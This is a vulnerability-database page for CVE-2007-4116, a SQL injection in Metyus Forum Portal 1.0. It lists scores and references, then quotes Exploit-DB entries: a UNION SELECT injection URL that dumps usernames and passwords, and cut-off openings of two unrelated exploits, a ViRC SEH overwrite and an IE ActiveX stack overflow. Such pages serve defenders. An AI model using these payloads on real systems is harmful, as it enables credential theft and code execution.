CVE-2007-4116
published 2007-07-31CVE-2007-4116: SQL injection vulnerability in philboard_forum.asp in Metyus Forum Portal 1.0 allows remote attackers to execute arbitrary SQL commands via the forumid…
PriorityP434medium6.8CVSS 2.0
AVNACMAuNCPIPAP
EXPLOIT
EPSS
1.10%
61.7th percentile
SQL injection vulnerability in philboard_forum.asp in Metyus Forum Portal 1.0 allows remote attackers to execute arbitrary SQL commands via the forumid parameter. NOTE: this might be related to CVE-2007-0920 or CVE-2007-3884.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| metyus | forum_portal | — | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Metyus Forum Portal 1.0 - 'Philboard_Forum.asp' SQL Injection
exploitdb·2007-07-27
CVE-2007-4116 Metyus Forum Portal 1.0 - 'Philboard_Forum.asp' SQL Injection
Metyus Forum Portal 1.0 - 'Philboard_Forum.asp' SQL Injection
---
source: https://www.securityfocus.com/bid/25096/info
Metyus Forum Portal is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Metyus Forum Portal 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/philboard_forum.asp?forumid=-99+union+all+select+0,1,2%20,3,4,5,6,7,8,9,password,username,12,13,14,15,16,17,18,19,20+%20from+users
Exploit-DB
ViRC 2.0 - JOIN Response Remote Overwrite (SEH)
exploitdb·2007-07-06
CVE-2007-3612 ViRC 2.0 - JOIN Response Remote Overwrite (SEH)
ViRC 2.0 - JOIN Response Remote Overwrite (SEH)
---
#!/usr/bin/python
# ViRC 2.0 'JOIN Response' 0day Remote SEH Overwrite PoC Exploit
# Bug discovered by Krystian Kloskowski (h07)
# Tested on Visual IRC 2.0 / 2k SP4 Polish
# Shellcode type: Windows Execute Command (calc.exe)
# How stuff works ? ..
#
# [ViRC] -----> (..JOIN..) -------------> [exploit_tunnel] -----------------------------> [Real IRC server]
# [ViRC] <--- (#channel :AAAAAAA...) <--- [exploit_tunnel] <---- (#channel :nick) <------ [Real IRC server]
#
# Details:
# "#channel :" + "A" * 4116
# 0x41414141 Pointer to next SEH record
# 0x41414141 SE handler
##
from thread import start_new_thread
from struct import pack
from string import find
from string import join
from socket import *
LEN_RECV = 65536
in_addr = '0.0.0.0' # l
Exploit-DB
Microsoft Internet Explorer - NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow (2)
exploitdb·2007-04-27
CVE-2007-0018 Microsoft Internet Explorer - NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow (2)
Microsoft Internet Explorer - NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow (2)
---
Sub tryMe
'------------------------------------------------------------------
'[PoC2] IE NCTAudioFile2.AudioFile ActiveX Remote Stack Overfl0w
'original advisory: http://secunia.com/advisories/23475/
'author: shinnai
'mail: shinnai[at]autistici[dot]org
'site: http://shinnai.altervista.org
'based on: http://www.milw0rm.com/exploits/3728
'(see what InTeL said about Win XP Pro SP2 and IE7, enjoy brotha ;)
'modified for working on Win XP Pro SP2 with IE7 full patched
'------------------------------------------------------------------
buff = String (4116, "A")
get_EIP = unescape("%EB%AA%D7%77") '0x77D7AAEB call esp (from user32.dll)
nop = unescape("%90%90%90%90%90%90%90%90%90%90")
shellcode = u
No writeups or analysis indexed.
http://secunia.com/advisories/26253http://securityreason.com/securityalert/2951http://www.securityfocus.com/archive/1/474815/100/0/threadedhttp://www.securityfocus.com/bid/25096http://www.vupen.com/english/advisories/2007/2718https://exchange.xforce.ibmcloud.com/vulnerabilities/35651http://secunia.com/advisories/26253http://securityreason.com/securityalert/2951http://www.securityfocus.com/archive/1/474815/100/0/threadedhttp://www.securityfocus.com/bid/25096http://www.vupen.com/english/advisories/2007/2718https://exchange.xforce.ibmcloud.com/vulnerabilities/35651
2007-07-31
Published